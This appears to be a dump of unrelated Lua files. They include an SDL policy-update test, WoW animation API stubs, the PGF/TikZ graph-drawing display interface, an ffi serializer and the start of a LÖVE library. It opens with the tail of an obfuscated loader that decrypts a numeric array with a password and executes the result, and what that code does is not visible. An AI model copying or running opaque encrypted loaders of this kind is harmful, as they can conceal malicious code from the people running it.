39,27,66,56,69,30,97,26,53,63,82,46,83,0,83,46,40,29,94,27,85,28,60,52,46,12,28,32,66,80,74,6,58,70,0,14,1,22,82,66,34,26,14,115,87,49,55,18,26,56,104,27,3,58,21,112,78,84,1,26,88,22,92,124,62,7,47,111,69,27,22,174,6,94,16,93,53,75,126,72,70,67,23,75,10,24,95,94,23,1,88,67,23,84,174,69,1,22,47,84,37,83,17,11,76,11,19,72,44,60,202,80,57,74,83,28,17,15,120,18,32,26,1,29,123,125,65,66,39,13,56,2,65,52,93,117,23,29,46,84,65,77,65,91,27,35,44,29,120,77,1,18,53,108,95,51,17,80,11,64,29,36,88,47,126,69,59,41,37,121,104,10,97,69,47,124,125,69,108,25,56,94,35,46,40,229,84,47,123,125,26,61,66,17,78,75,69,4,22,0,39,82,122,17,41,56,58,2,29,1,68,10,123,46,39,90,66,47,91,90,104,71,22,114,29,109,12,44,29,1,22,53,4,119,86,19,4,110,223,124,7,84,86,29,125,2,7,36,8,6,16,7,52,91,83,13,109,39,8,47,37,126,122,92,46,96,60,104,111,68,29,100,55,47,9,58,44,53},key))if a then a()else print("WRONG PASSWORD!")end
|
---------------------------------------------------------------------------------------------
-- Requirement summary:
-- [PTU-Proprietary] Transfer SystemRequest from mobile app to HMI
--
-- Description:
-- 1. Used preconditions: SDL is built with "DEXTENDED_POLICY: ON" flag. Trigger for PTU occurs
-- 2. Performed steps:
-- MOB->SDL: SystemRequest(PROPRIETARY, filename)
-- SDL->HMI: BasicCommunication.SystemRequest (PROPRIETARY, filename, appID)
--
-- Expected result:
-- SDL must send BasicCommunication.SystemRequest (<path to UpdatedPT>, PROPRIETARY, params) to HMI
---------------------------------------------------------------------------------------------
--[[ Required Shared libraries ]]
local commonFunctions = require ('user_modules/shared_testcases/commonFunctions')
local commonSteps = require('user_modules/shared_testcases/commonSteps')
--[[ General Precondition before ATF start ]]
commonSteps:DeleteLogsFileAndPolicyTable()
--[[ Local Variables ]]
local BasicCommunicationSystemRequestData
local testData = {
fileName = "PTUpdate",
requestType = "PROPRIETARY",
ivsuPath = "/tmp/fs/mp/images/ivsu_cache/"
}
--[[ General Settings for configuration ]]
Test = require('connecttest')
require('user_modules/AppTypes')
--[[ Preconditions ]]
commonFunctions:newTestCasesGroup("Preconditions")
--[[ Test ]]
commonFunctions:newTestCasesGroup("Test")
function Test:TestStep_Update_Policy()
local requestId = self.hmiConnection:SendRequest("SDL.GetPolicyConfigurationData",
{ policyType = "module_config", property = "endpoints" })
EXPECT_HMIRESPONSE(requestId, { result = { code = 0, method = "SDL.GetPolicyConfigurationData" }})
:Do(function()
self.hmiConnection:SendNotification("BasicCommunication.OnSystemRequest", {requestType = "PROPRIETARY", fileName = testData.fileName})
EXPECT_NOTIFICATION("OnSystemRequest", { requestType = "PROPRIETARY" })
:Do(function()
self.mobileSession:SendRPC("SystemRequest",
{
fileName = testData.fileName,
requestType = "PROPRIETARY"
}, "files/ptu.json")
EXPECT_HMICALL("BasicCommunication.SystemRequest")
:Do(function(_,data)
BasicCommunicationSystemRequestData = data
end)
end)
end)
end
function Test:TestStep_Check_BC_SystemRequest()
local filePath = testData.ivsuPath .. testData.fileName
if BasicCommunicationSystemRequestData.params.fileName ~= filePath or
BasicCommunicationSystemRequestData.params.requestType ~= testData.requestType then
self.FailTestCase("Data of BC.SystemRequest is incorrect")
end
end
--[[ Postconditions ]]
commonFunctions:newTestCasesGroup("Postconditions")
function Test.Postcondition_ForceStopSDL()
StopSDL()
end
return Test
|
--- Rotation
---
--- Rotation is an Animation that automatically applies an affine rotation to the region being animated. You can set the origin around which the rotation is being done, and the angle of rotation in either degrees or radians.
--- Rotation animations have no effect on FontStrings.
---
--- @See http://wowprogramming.com/docs/widgets/Rotation
---@class Rotation : Animation
Rotation = {};
--- Returns the rotation animation's origin point. During a rotation animation, the origin point remains in place while the positions of all other points in the scaled region are moved according to the rotation amount.
--- @return point, xOffset, yOffset
function Rotation:GetOrigin() end
--- Sets the animation's rotation amount (in degrees)
--- @param degrees number
--- Amount by which the region should rotate over the animation's duration (in degrees; positive values for counter-clockwise rotation, negative for clockwise)
function Rotation:SetDegrees(degrees) end
--- Sets the rotation animation's origin point. During a rotation animation, the origin point remains in place while the positions of all other points in the scaled region are moved according to the rotation amount.
--- @param point anchorPoint
--- Anchor point for the rotation origin (string,
--- @param xOffset number
--- Horizontal distance from the anchor point to the rotation origin (in pixels)
--- @param yOffset number
--- Vertical distance from the anchor point to the rotation origin (in pixels)
function Rotation:SetOrigin(point, xOffset, yOffset) end
--- Sets the animation's rotation amount (in radians)
--- @param radians number
--- Amount by which the region should rotate over the animation's duration (in radians; positive values for counter-clockwise rotation, negative for clockwise)
function Rotation:SetRadians(radians) end
--- Returns the animation's rotation amount (in radians)
--- @return radians
function Rotation:GetRadians() end
|
-- Copyright 2012 by Till Tantau
--
-- This file may be distributed an/or modified
--
-- 1. under the LaTeX Project Public License and/or
-- 2. under the GNU Public License
--
-- See the file doc/generic/pgf/licenses/LICENSE for more information
-- @release $Header$
---
-- This class provides the interface between a display
-- layer (like \tikzname\ or a graph editor) and graph drawing
-- system. Another class, |InterfaceToAlgorithms|, binds the algorithm
-- layer (which are written in Lua) to the graph drawing system.
--
-- The functions declared here are independent of the actual display
-- layer. Rather, the differences between the layers are encapsulated
-- by subclasses of the |Binding| class, see that class for
-- details. Thus, when a new display layer is written, the present
-- class is \emph{used}, but not \emph{modified}. Instead, only a new
-- binding is created and all display layer specific interaction is
-- put there.
--
-- The job of this class is to provide convenient methods that can be
-- called by the display layer. For instance, it provides methods for
-- starting a graph drawing scope, managing the stack of such scope,
-- adding a node to a graph and so on.
local InterfaceToDisplay = {}
-- Namespace
require("pgf.gd.interface").InterfaceToDisplay = InterfaceToDisplay
-- Imports
local InterfaceCore = require "pgf.gd.interface.InterfaceCore"
local Scope = require "pgf.gd.interface.Scope"
local Binding = require "pgf.gd.bindings.Binding"
local Sublayouts = require "pgf.gd.control.Sublayouts"
local LayoutPipeline = require "pgf.gd.control.LayoutPipeline"
local Digraph = require "pgf.gd.model.Digraph"
local Vertex = require "pgf.gd.model.Vertex"
local Edge = require "pgf.gd.model.Edge"
local Collection = require "pgf.gd.model.Collection"
local Storage = require "pgf.gd.lib.Storage"
local LookupTable = require "pgf.gd.lib.LookupTable"
local Event = require "pgf.gd.lib.Event"
local lib = require "pgf.gd.lib"
-- Forward declarations
local get_current_options_table
local render_collections
local push_on_option_stack
local vertex_created
-- Local objects
local phase_unique = {} -- a unique handle
local collections_unique = {} -- a unique handle
local option_cache = nil -- The option cache
---
-- Initialize the binding. This function is called once by the display
-- layer at the very beginning. For instance, \tikzname\ does the
-- following call:
-- %
--\begin{codeexample}[code only, tikz syntax=false]
--InterfaceToDisplay.bind(require "pgf.gd.bindings.BindingToPGF")
--\end{codeexample}
--
-- Inside this call, many standard declarations will be executed, that
-- is, the declared binding will be used immediately.
--
-- Subsequently, the |binding| field of the |InterfaceCore| can be used.
--
-- @param class A subclass of |Binding|.
function InterfaceToDisplay.bind(class)
assert (not InterfaceCore.binding, "binding already initialized")
-- Create a new object
InterfaceCore.binding = setmetatable({}, class)
-- Load these libraries, which contain many standard declarations:
require "pgf.gd.model.library"
require "pgf.gd.control.library"
end
---
-- Start a graph drawing scope. Note that this is not the same as
-- starting a subgraph / sublayout, which are local to a graph drawing
-- scope: When a new graph drawing scope is started, it is pushed on
-- top of a stack of graph drawing scopes and all other ``open''
-- scopes are no longer directly accessible. All method calls to an
-- |Interface...| object will refer to this newly created scope until
-- either a new scope is opened or until the current scope is closed
-- once more.
--
-- Each graph drawing scope comes with a syntactic digraph that is
-- build using methods like |addVertex| or |addEdge|.
--
-- @param height The to-be-used height of the options stack. All
-- options above this height will be popped prior to attacking the
-- options to the syntactic digraph.
function InterfaceToDisplay.beginGraphDrawingScope(height)
-- Create a new scope table
local scope = Scope.new {}
-- Setup syntactic digraph:
local g = scope.syntactic_digraph
g.options = get_current_options_table(height)
g.syntactic_digraph = g
g.scope = scope
-- Push scope:
InterfaceCore.scopes[#InterfaceCore.scopes + 1] = scope
end
---
-- Arranges the current graph using the specified algorithm and options.
--
-- This function should be called after the graph drawing scope has
-- been opened and the syntactic digraph has been completely
-- specified. It will now start running the algorithm specified
-- through the |algorithm_phase| options.
--
-- Internally, this function creates a coroutine that will run the current graph
-- drawing algorithm. Coroutines are needed since a graph drawing
-- algorithm may choose to create a new node. In this case, the
-- algorithm needs to be suspended and control must be returned back
-- to the display layer, so that the node can be typeset in order to
-- determine the precise size information. Once this is done, control
-- must be passed back to the exact point inside the algorithm where
-- the node was created. Clearly, all of these actions are exactly
-- what coroutines are for.
--
-- @return Time it took to run the algorithm
function InterfaceToDisplay.runGraphDrawingAlgorithm()
-- Time things
local start = os.clock()
-- Setup
local scope = InterfaceCore.topScope()
assert(not scope.coroutine, "coroutine already created for current gd scope")
-- The actual drawing function
local function run ()
if #scope.syntactic_digraph.vertices == 0 then
-- Nothing needs to be done
return
end
LayoutPipeline.run(scope)
end
scope.coroutine = coroutine.create(run)
-- Run it:
InterfaceToDisplay.resumeGraphDrawingCoroutine()
-- End timing:
local stop = os.clock()
return stop - start
end
---
-- Resume the graph drawing coroutine.
--
-- This function is the work horse of the coroutine management. It
-- gets called whenever control passes back from the display layer to
-- the algorithm level. We resume the graph drawing coroutine so that the
-- algorithm can start/proceed. The tricky part is when the algorithm
-- yields, but is not done. In this case, the code needed for creating
-- a new node is passed back to the display layer through the binding,
-- which must then execute the code and then resuming the coroutine.
--
function InterfaceToDisplay.resumeGraphDrawingCoroutine()
-- Setup
local scope = InterfaceCore.topScope()
local binding = InterfaceCore.binding
-- Asserts
assert(scope.coroutine, "coroutine not created for current gd scope")
-- Run
local ok, text = coroutine.resume(scope.coroutine)
assert(ok, text)
if coroutine.status(scope.coroutine) ~= "dead" then
-- Ok, ask binding to continue
binding:resumeGraphDrawingCoroutine(text)
end
end
--- Ends the current graph drawing scope.
--
function InterfaceToDisplay.endGraphDrawingScope()
assert(#InterfaceCore.scopes > 0, "no gd scope open")
InterfaceCore.scopes[#InterfaceCore.scopes] = nil -- pop
end
---
-- Creates a new vertex in the syntactic graph of the current graph
-- drawing scope. The display layer should call this function for each
-- node of the graph. The |name| must be a unique string identifying
-- the node. The newly created vertex will be added to the syntactic
-- digraph. The binding function |everyVertexCreation| will then be
-- called, allowing the binding to store information regarding the newly
-- created vertex.
--
-- For each vertex an event will be created in the event
-- sequence. This event will have the kind |"node"| and its
-- |parameter| will be the vertex.
--
-- @param name Name of the vertex.
--
-- @param shape The shape of the vertex such as |"circle"| or
-- |"rectangle"|. This shape may help a graph drawing algorithm
-- figuring out how the node should be placed.
--
-- @param path A |Path| object representing the vertex's path.
--
-- @param height The to-be-used height of the options stack. All
-- options above this height will be popped prior to attacking the
-- options to the syntactic digraph.
--
-- @param binding_infos These options are passed to and are specific
-- to the current |Binding|.
--
-- @param anchors A table of anchors (mapping anchor positions to
-- |Coordinates|).
function InterfaceToDisplay.createVertex(name, shape, path, height, binding_infos, anchors)
-- Setup
local scope = InterfaceCore.topScope()
local binding = InterfaceCore.binding
-- Does vertex already exist?
local v = scope.node_names[name]
assert (not v or not v.created_on_display_layer, "node already created")
-- Create vertex
if not v then
v = Vertex.new {
name = name,
shape = shape,
kind = "node",
path = path,
options = get_current_options_table(height),
anchors = anchors,
}
vertex_created(v,scope)
else
assert(v.kind == "subgraph node", "subgraph node expected")
v.shape = shape
v.path = path
v.anchors = anchors
end
v.created_on_display_layer = true
-- Call binding
binding.storage[v] = binding_infos
binding:everyVertexCreation(v)
end
-- This is a helper function
function vertex_created(v,scope)
-- Create Event
local e = InterfaceToDisplay.createEvent ("node", v)
v.event = e
-- Create name lookup
scope.node_names[v.name] = v
-- Add vertex to graph
scope.syntactic_digraph:add {v}
-- Add to collections
for _,c in ipairs(v.options.collections) do
LookupTable.addOne(c.vertices, v)
end
end
---
-- Creates a new vertex in the syntactic graph of the current graph
-- drawing scope that is a subgraph vertex. Such a vertex
-- ``surrounds'' the vertices of a subgraph. The special property of a
-- subgraph node opposed to a normal node is that it is created only
-- after the subgraph has been laid out. However, the difference to a
-- collection like |hyper| is that the node is available immediately as
-- a normal node in the sense that you can connect edges to it.
--
-- What happens internally is that subgraph nodes get ``registered''
-- immediately both on the display level and on the algorithm level,
-- but the actual node is only created inside the layout pipeline
-- using a callback of the binding. The present function is used to
-- perform this registering. The node creation happens when the
-- innermost layout in which the subgraph node is declared has
-- finished. For each subgraph node, a collection is created that
-- contains all vertices (and edges) being part of the subgraph. For
-- this reason, this method is a |push...| method, since it pushes
-- something on the options stack.
--
-- The |init| parameter will be used during the creation of the node,
-- see |Binding:createVertex| for details on the fields. Note that
-- |init.text| is often not displayed for such ``vast'' nodes as those
-- created for whole subgraphs, but a shape may use it nevertheless
-- (for instance, one might display this text at the top of the node
-- or, in case of a \textsc{uml} package, in a special box above the
-- actual node).
--
-- The |init.generated_options| will be augmented by additional
-- key--value pairs when the vertex is created:
-- %
-- \begin{itemize}
-- \item The key |subgraph point cloud| will have as its value a
-- string that is be a list of points (without separating commas)
-- like |"(10pt,20pt)(0pt,0pt)(30pt,40pt)"|, always in
-- this syntax. The list will contain all points inside the
-- subgraph. In particular, a bounding box around these points will
-- encompass all nodes and bend points of the subgraph.
-- The bounding box of this point cloud is guaranteed to be centered on
-- the origin.
-- \item The key |subgraph bounding box width| will have as its value
-- the width of a bounding box (in \TeX\ points, as a string with the
-- suffix |"pt"|).
-- \item The key |subgraph bounding box height| stores the height of a
-- bounding box.
-- \end{itemize}
--
-- @param name The name of the node.
-- @param height Height of the options stack. Note that this method
-- pushes something (namely a collection) on the options stack.
-- @param info A table passed to |Binding:createVertex|, see that function.
--
function InterfaceToDisplay.pushSubgraphVertex(name, height, info)
-- Setup
local scope = InterfaceCore.topScope()
local binding = InterfaceCore.binding
-- Does vertex already exist?
assert (not scope.node_names[name], "node already created")
-- Create vertex
local v = Vertex.new {
name = name,
kind = "subgraph node",
options = get_current_options_table(height-1)
}
vertex_created(v,scope)
-- Store info
info.generated_options = info.generated_options or {}
info.name = name
v.subgraph_info = info
-- Create collection and link it to v
local _, _, entry = InterfaceToDisplay.pushOption(InterfaceCore.subgraph_node_kind, nil, height)
v.subgraph_collection = entry.value
v.subgraph_collection.subgraph_node = v
-- Find parent collection in options stack:
local collections = v.options.collections
for i=#collections,1,-1 do
if collections[i].kind == InterfaceCore.sublayout_kind then
v.subgraph_collection.parent_layout = collections[i]
break
end
end
end
---
-- Add options for an already existing vertex.
--
-- This function allows you to add options to an already existing
-- vertex. The options that will be added are all options on the
-- current options stack; they will overwrite existing options of the
-- same name. For collections, the vertex stays in all collections it
-- used to, it is only added to all collections that are currently on
-- the options stack.
--
-- @param name Name of the vertex.
-- @param height The option stack height.
function InterfaceToDisplay.addToVertexOptions(name, height)
-- Setup
local scope = InterfaceCore.topScope()
-- Does vertex already exist?
local v = assert (scope.node_names[name], "node is missing, cannot add options")
v.options = get_current_options_table(height, v.options)
-- Add to collections
for _,c in ipairs(v.options.collections) do
LookupTable.addOne(c.vertices, v)
end
end
---
-- Creates a new edge in the syntactic graph of the current graph
-- drawing scope. The display layer should call this function for each
-- edge that is created. Both the |from| vertex and the |to| vertex
-- must exist (have been created through |createVertex|) prior to your
-- being able to call this function.
--
-- After the edge has been created, the binding layer's function
-- |everyEdgeCreation| will be called, allowing the binding layer to
-- store information about the edge.
--
-- For each edge an event is created, whose kind is |"edge"| and whose
-- |parameter| is a two-element array whose first entry is the edge's
-- arc in the syntactic digraph and whose second entry is the position
-- of the edge in the arc's array of syntactic edges.
--
-- @param tail Name of the node the edge begins at.
-- @param head Name of the node the edge ends at.
-- @param direction Direction of the edge (e.g. |--| for an undirected edge
-- or |->| for a directed edge from the first to the second
-- node).
-- @param height The option stack height, see for instance |createVertex|.
--
-- @param binding_infos These options will be stored in the |storage|
-- of the vertex at the field index by the binding.
function InterfaceToDisplay.createEdge(tail, head, direction, height, binding_infos)
-- Setup
local scope = InterfaceCore.topScope()
local binding = InterfaceCore.binding
-- Does vertex already exist?
local h = scope.node_names[head]
local t = scope.node_names[tail]
assert (h and t, "attempting to create edge between nodes that are not in the graph")
-- Create Arc object
local arc = scope.syntactic_digraph:connect(t, h)
-- Create Edge object
local edge = Edge.new {
head = h,
tail = t,
direction = direction,
options = get_current_options_table(height)
}
-- Add to arc
arc.syntactic_edges[#arc.syntactic_edges+1] = edge
-- Create Event
local e = InterfaceToDisplay.createEvent ("edge", { arc, #arc.syntactic_edges })
edge.event = e
-- Make part of collections
for _,c in ipairs(edge.options.collections) do
LookupTable.addOne(c.edges, edge)
end
-- Call binding
binding.storage[edge] = binding_infos
binding:everyEdgeCreation(edge)
end
---
-- Push an option to the stack of options.
--
-- As a graph is parsed, a stack of ``current options''
-- is created. To add something to this table, the display layers may
-- call the method |pushOption|. To pop something from this stack,
-- just set the |height| value during the next push to the position to
-- which you actually wish to push something; everything above and
-- including this position will be popped from the stack.
--
-- When an option is pushed, several additional options may also be
-- pushed, namely whenever the option has a |use| field set. These
-- additional options may, in turn, also push new options. Because of
-- this, this function returns a new stack height, representing the
-- resulting stack height.
--
-- In addition to this stack height, this function returns a Boolean
-- value indicating whether a ``main algorithm phase was set''. This
-- happens whenever a key is executed (directly or indirectly through
-- the |use| field) that selects an algorithm for the ``main''
-- algorithm phase. This information may help the caller to setup the
-- graph drawing scopes correctly.
--
-- @param key A parameter (must be a string).
-- @param value A value (can be anything). If it is a string, it will
-- be converted to whatever the key expects.
-- @param height A stack height at which to insert the key. Everything
-- above this height will be removed.
--
-- @return A new stack height
-- @return A Boolean that is |true| if the main algorithm phase was
-- set by the option or one option |use|d by it.
-- @return The newly created entry on the stack. If more entries are
-- created through the use of the |use| field, the original entry is
-- returned nevertheless.
function InterfaceToDisplay.pushOption(key, value, height)
assert(type(key) == "string", "illegal key")
local key_record = assert(InterfaceCore.keys[key], "unknown key")
local main_phase_set = false
if value == nil and key_record.default then
value = key_record.default
end
-- Find out what kind of key we are pushing:
if key_record.algorithm then
-- Push a phase
if type(InterfaceCore.algorithm_classes[key]) == "function" then
-- Call the constructor function
InterfaceCore.algorithm_classes[key] = InterfaceCore.algorithm_classes[key]()
end
local algorithm = InterfaceCore.algorithm_classes[key]
assert (algorithm, "algorithm class not found")
push_on_option_stack(phase_unique,
{ phase = value or key_record.phase, algorithm = algorithm },
height)
if key_record.phase == "main" then
main_phase_set = true
end
elseif key_record.layer then
-- Push a collection
local stack = InterfaceCore.option_stack
local scope = InterfaceCore.topScope()
-- Get the stack above "height":
local options = get_current_options_table(height-1)
-- Create the collection event
local event = InterfaceToDisplay.createEvent ("collection", key)
-- Create collection object:
local collection = Collection.new { kind = key, options = options, event = event }
-- Store in collections table of current scope:
local collections = scope.collections[key] or {}
collections[#collections + 1] = collection
scope.collections[key] = collections
-- Build collection tree
collection:registerAsChildOf(options.collections[#options.collections])
-- Push on stack
push_on_option_stack(collections_unique, collection, height)
else
-- A normal key
push_on_option_stack(key, InterfaceCore.convert(value, InterfaceCore.keys[key].type), height)
end
local newly_created = InterfaceCore.option_stack[#InterfaceCore.option_stack]
-- Now, push use keys:
local use = key_record.use
if key_record.use then
local flag
for _,u in ipairs(InterfaceCore.keys[key].use) do
local use_k = u.key
local use_v = u.value
if type(use_k) == "function" then
use_k = use_k(value)
end
if type(use_v) == "function" then
use_v = use_v(value)
end
height, flag = InterfaceToDisplay.pushOption(use_k, use_v, height+1)
main_phase_set = main_phase_set or flag
end
end
return height, main_phase_set, newly_created
end
---
-- Push a layout on the stack of options. As long as this layout is on
-- the stack, all vertices and edges will be part of this layout. For
-- details on layouts, please see |Sublayouts|.
--
-- @param height A stack height at which to insert the key. Everything
-- above this height will be removed.
function InterfaceToDisplay.pushLayout(height)
InterfaceToDisplay.pushOption(InterfaceCore.sublayout_kind, nil, height)
end
---
-- Creates an event and adds it to the event string of the current scope.
--
-- @param kind Name/kind of the event.
-- @param parameters Parameters of the event.
--
-- @return The newly pushed event
--
function InterfaceToDisplay.createEvent(kind, param)
local scope = InterfaceCore.topScope()
local n = #scope.events + 1
local e = Event.new { kind = kind, parameters = param, index = n }
scope.events[n] = e
return e
end
---
-- This method allows you to query the table of all declared keys. It
-- contains them both as an array and also as a table index by the
-- keys's names. In particular, you can then iterate over it using
-- |ipairs| and you can check whether a key is defined by accessing
-- the table at the key's name. Each entry of the table is the
-- original table passed to |InterfaceToAlgorithms.declare|.
--
-- @return A lookup table of all declared keys.
function InterfaceToDisplay.getDeclaredKeys()
return InterfaceCore.keys
end
---
-- Renders the graph.
--
-- This function is called after the graph has been laid out by the
-- graph drawing algorithms. It will trigger a sequence of calls to
-- the binding layer that will, via callbacks, start rendering the
-- whole graph.
--
-- In detail, this function calls:
-- %
--\begin{codeexample}[code only, tikz syntax=false]
--local binding = InterfaceCore.binding
--
--binding:renderStart()
--render_vertices()
--render_edges()
--render_collections()
--binding:renderStop()
--\end{codeexample}
--
-- Here, the |render_...| functions are local, internal functions that are,
-- nevertheless, documented here.
--
-- @param name Returns the algorithm class that has been declared using
-- |declare| under the given name.
function InterfaceToDisplay.renderGraph()
local scope = InterfaceCore.topScope()
local syntactic_digraph = scope.syntactic_digraph
local binding = InterfaceCore.binding
binding:renderStart()
render_vertices(syntactic_digraph.vertices)
render_edges(syntactic_digraph.arcs)
render_collections(scope.collections)
binding:renderStop()
end
---
-- Render the vertices after the graph drawing algorithm has
-- finished. This function is local and internal and included only for
-- documenting the call graph.
--
-- When the graph drawing algorithm is done, the interface will start
-- rendering the vertices by calling appropriate callbacks of the
-- binding layer.
--
-- Consider the following code:
-- %
--\begin{codeexample}[code only]
--\graph [... layout] {
-- a -- b -- c -- d;
--};
--\end{codeexample}
--
-- In this case, after the graph drawing algorithm has run, the
-- present function will call:
-- %
--\begin{codeexample}[code only, tikz syntax=false]
--local binding = InterfaceCore.binding
--
--binding:renderVerticesStart()
--binding:renderVertex(vertex_a)
--binding:renderVertex(vertex_b)
--binding:renderVertex(vertex_c)
--binding:renderVertex(vertex_d)
--binding:renderVerticesStop()
--\end{codeexample}
--
-- @param vertices An array of all vertices in the syntactic digraph.
function render_vertices(vertices)
InterfaceCore.binding:renderVerticesStart()
for _,vertex in ipairs(vertices) do
InterfaceCore.binding:renderVertex(vertex)
end
InterfaceCore.binding:renderVerticesStop()
end
---
-- Render the collections whose layer is not |0|. This local, internal
-- function is called to render the different collection kinds.
--
-- Collection kinds rendered in the order provided by the |layer|
-- field passed to |declare| during the declaration of the collection
-- kind, see also |declare_collection|. If several collection kinds
-- have the same layer, they are rendered in lexicographical ordering
-- (to ensure that they are always rendered in the same order).
--
-- Consider the following code:
-- %
--\begin{codeexample}[code only, tikz syntax=false]
--declare { key = "hyper", layer = 1 }
--\end{codeexample}
-- you can say on the \tikzname\ layer
--\begin{codeexample}[code only]
--\graph {
-- a, b, c, d;
-- { [hyper] a, b, c }
-- { [hyper] b, c, d }
--};
--\end{codeexample}
--
-- In this case, after the graph drawing algorithm has run, the
-- present function will call:
--
--\begin{codeexample}[code only, tikz syntax=false]
--local binding = InterfaceCore.binding
--
--binding:renderCollectionStartKind("hyper", 1)
--binding:renderCollection(collection_containing_abc)
--binding:renderCollection(collection_containing_bcd)
--binding:renderCollectionStopKind("hyper", 1)
--\end{codeexample}
--
-- @param collections The |collections| table of the current scope.
function render_collections(collections)
local kinds = InterfaceCore.collection_kinds
local binding = InterfaceCore.binding
for i=1,#kinds do
local kind = kinds[i].kind
local layer = kinds[i].layer
if layer ~= 0 then
binding:renderCollectionStartKind(kind, layer)
for _,c in ipairs(collections[kind] or {}) do
binding:renderCollection(c)
end
binding:renderCollectionStopKind(kind, layer)
end
end
end
---
-- Render the syntactic edges of a graph after the graph drawing
-- algorithm has finished. This function is local and internal and included only
-- for documenting the call graph.
--
-- When the graph drawing algorithm is done, the interface will first
-- rendering the vertices using |render_vertices|, followed by calling
-- this function, which in turn calls appropriate callbacks to the
-- binding layer.
--
-- Consider the following code:
-- %
--\begin{codeexample}[code only]
-- \graph [... layout] {
-- a -- b -- c -- d;
-- };
--\end{codeexample}
--
-- In this case, after the graph drawing algorithm has run, the
-- present function will call:
-- %
--\begin{codeexample}[code only, tikz syntax=false]
-- local binding = InterfaceCore.binding
--
-- binding:renderEdgesStart()
-- binding:renderEdge(edge_from_a_to_b)
-- binding:renderEdge(edge_from_b_to_c)
-- binding:renderEdge(edge_from_c_to_d)
-- binding:renderEdgesStop()
--\end{codeexample}
--
-- @param arcs The array of arcs of the syntactic digraph.
function render_edges(arcs)
InterfaceCore.binding:renderEdgesStart()
for _,a in ipairs(arcs) do
for _,e in ipairs (a.syntactic_edges) do
InterfaceCore.binding:renderEdge(e)
end
end
InterfaceCore.binding:renderEdgesStop()
end
local aliases = InterfaceCore.option_aliases
local option_initial = InterfaceCore.option_initial
local option_metatable = {
__index =
function (t, key)
local k = aliases[key]
if k then
local v = (type(k) == "string" and t[k]) or (type(k) == "function" and k(t)) or nil
if v ~= nil then
return v
end
end
return option_initial[key]
end
}
---
-- Get the current options table.
--
-- An option table can be accessed like a normal table; however, there
-- is a global fallback for this table. If an index is not defined,
-- the value of this index in the global fallback table is used. (This
-- reduces the overall amount of option keys that need to be stored
-- with object.)
--
-- (This function is local and internal and included only for documentation
-- purposes.)
--
-- @param height The stack height for which the option table is
-- required.
-- @param table If non |nil|, the options will be added to this
-- table.
--
-- @return The option table as described above.
function get_current_options_table (height, table)
local stack = InterfaceCore.option_stack
assert (height >= 0 and height <= #stack, "height value out of bounds")
if height == InterfaceCore.option_cache_height and not table then
return option_cache
else
-- Clear superfluous part of stack
for i=#stack,height+1,-1 do
stack[i] = nil
end
-- Build options table
local cache
if not table then
cache = setmetatable(
{
algorithm_phases = setmetatable({}, InterfaceCore.option_initial.algorithm_phases),
collections = {}
}, option_metatable)
else
cache = lib.copy(table)
cache.algorithm_phases = lib.copy(cache.algorithm_phases)
cache.collections = lib.copy(cache.collections)
end
local algorithm_phases = cache.algorithm_phases
local collections = cache.collections
local keys = InterfaceCore.keys
local function handle (k, v)
if k == phase_unique then
algorithm_phases[v.phase] = v.algorithm
local phase_stack = v.phase .. " stack"
local t = rawget(algorithm_phases, phase_stack)
if not t then
t = algorithm_phases[phase_stack]
assert(type(t) == "table", "unknown phase")
t = lib.copy(t)
algorithm_phases[phase_stack] = t
end
t[#t + 1] = v.algorithm
elseif k == collections_unique then
LookupTable.addOne(collections, v)
else
cache[k] = v
end
end
for _,s in ipairs(stack) do
handle (s.key, s.value)
end
-- Cache it, if this was not added:
if not table then
InterfaceCore.option_cache_height = height
option_cache = cache
end
return cache
end
end
-- A helper function
function push_on_option_stack(key, value, height)
local stack = InterfaceCore.option_stack
assert (type(height) == "number" and height > 0 and height <= #stack + 1,
"height value out of bounds")
-- Clear superfluous part of stack
for i=#stack,height+1,-1 do
stack[i] = nil
end
stack[height] = { key = key, value = value }
InterfaceCore.option_cache_height = nil -- invalidate cache
end
-- Done
return InterfaceToDisplay
|
local ffi = require"ffi"
----------------------------serialization
local function cdataSerialize(cd)
if ffi.istype("float[1]", cd) then
return table.concat{[[ffi.new('float[1]',]],cd[0],[[)]]}
elseif ffi.istype("int[1]", cd) then
return table.concat{[[ffi.new('int[1]',]],cd[0],[[)]]}
elseif ffi.istype("bool[1]", cd) then
return table.concat{[[ffi.new('bool[1]',]],tostring(cd[0]),[[)]]}
elseif ffi.istype("float[]",cd) then
local size = ffi.sizeof(cd)/ffi.sizeof"float"
local tab = {[[ffi.new("float[?]",]],size}
for i=0,size-1 do tab[#tab+1] = ",";tab[#tab+1] = cd[i] end
tab[#tab+1] = [[)]]
return table.concat(tab)
elseif ffi.istype("void*",cd) then
return table.concat{[[ffi.cast('void*',]],tonumber(ffi.cast("uintptr_t",cd)),[[)]]}
elseif ffi.istype("void*[1]",cd) then
return table.concat{[[ffi.new('void*[1]',ffi.cast('void*',]],tonumber(ffi.cast("uintptr_t",cd[0])),[[))]]}
elseif ffi.istype("const char*[1]",cd) then
return table.concat{[[ffi.new('const char*[1]',{']],ffi.string(cd[0]),[['})]]}
elseif ffi.istype("SlotInfo[]",cd) then
local size = ffi.sizeof(cd)/ffi.sizeof"SlotInfo"
local tab = {[[ffi.new("SlotInfo[?]",]],size,",{"}
for i=0,size-1 do
tab[#tab+1]="{'"
tab[#tab+1]= ffi.string(cd[i].title)
tab[#tab+1]= "',"
tab[#tab+1]= cd[i].kind
tab[#tab+1]= "},"
end
tab[#tab+1] = "})"
return table.concat(tab)
elseif ffi.istype("ImVec2",cd) then
return table.concat{[[ig.ImVec2(]],cd.x,",",cd.y,")"}
else
print(cd,"not serialized")
error"serialization error"
end
end
local function basicSerialize (o)
if type(o) == "number" then
return string.format("%.17g", o)
elseif type(o)=="boolean" then
return tostring(o)
elseif type(o) == "string" then
return string.format("%q", o)
elseif type(o)=="cdata" then
return cdataSerialize(o)
else
return tostring(nil) --"nil"
end
end
local function SerializeTable(name, value, saved)
local string_table = {}
if not saved then
table.insert(string_table, "local "..name.." = ")
else
table.insert(string_table, name.." = ")
end
saved = saved or {} -- initial value
if type(value)~= "table" then
table.insert(string_table,basicSerialize(value).."\n")
elseif type(value) == "table" then
if saved[value] then -- value already saved?
table.insert(string_table,saved[value].."\n")
else
saved[value] = name -- save name for next time
table.insert(string_table, "{}\n")
for k,v in pairs(value) do -- save its fields
local fieldname = string.format("%s[%s]", name,basicSerialize(k))
table.insert(string_table, SerializeTable(fieldname, v, saved))
end
end
end
return table.concat(string_table)
end
return SerializeTable |
-- Advanced Source Library
-- The /other/ A/S/L. :3
-- by zorg § ISC @ 2018-
-- Safeguards
assert(select(1, love.getVersion()) >= 11,
